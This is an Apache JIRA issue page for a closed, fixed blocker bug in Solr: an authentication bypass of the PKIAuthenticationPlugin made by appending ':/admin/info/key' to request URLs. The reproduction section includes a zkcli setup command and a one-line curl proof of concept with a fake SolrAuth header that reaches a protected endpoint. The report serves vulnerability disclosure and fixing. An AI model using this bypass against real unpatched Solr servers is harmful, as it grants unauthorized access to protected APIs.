[SOLR-17417] Authentication bypass possible using a fake :/admin/info/key URL Path ending - ASF JIRA

XML

Word

Printable

JSON

Details

Type: Bug
Status: Closed
Priority: Blocker
Resolution: Fixed
Affects Version/s: None
Fix Version/s: 8.11.3, 9.7
Component/s: Authorization
Labels:
None

Description

By using ":/admin/info/key" at the end of the URL, the PKIAuthenticationPlugin can be bypassed, so that non-authorized users can access protected APIs.

Reproduction:

Start Solr
./zkcli.sh -zkhost localhost:9983 -cmd put /security.json '{"authentication":{"class":"solr.BasicAuthPlugin","credentials":{"solr":"IV0EHq1OnNrj6gvRCwvFwTrZ1+z1oBbnQdiVC3otuq0= Ndd7LKvVBAaZIF0QAVi1ekCfAJXr1GGfLtRUXhgrF8c=","authorization":{"class":"solr.RuleBasedAuthorizationPlugin","permissions":[ {"name":"security-edit","role":"admin"}
],"user-role":{"solr":"admin"}}}'}}
curl -H "SolrAuth: XXXXX" http://127.0.0.1:8983/solr/admin/info/properties:/admin/info/key

The request should fail, but it will succeed.

Attachments

- Sort By Name
- Sort By Date
- Ascending
- Descending

SOLR-17417.patch
21/Aug/24 19:56
2 kB
Houston Putman

Activity

People

Assignee:: Houston Putman

Reporter:: Houston Putman

Votes:: 0 Vote for this issue

Watchers:: 5 Start watching this issue

Dates

Created:: 21/Aug/24 19:47

Updated:: 21/Oct/24 21:00

Resolved:: 27/Aug/24 20:06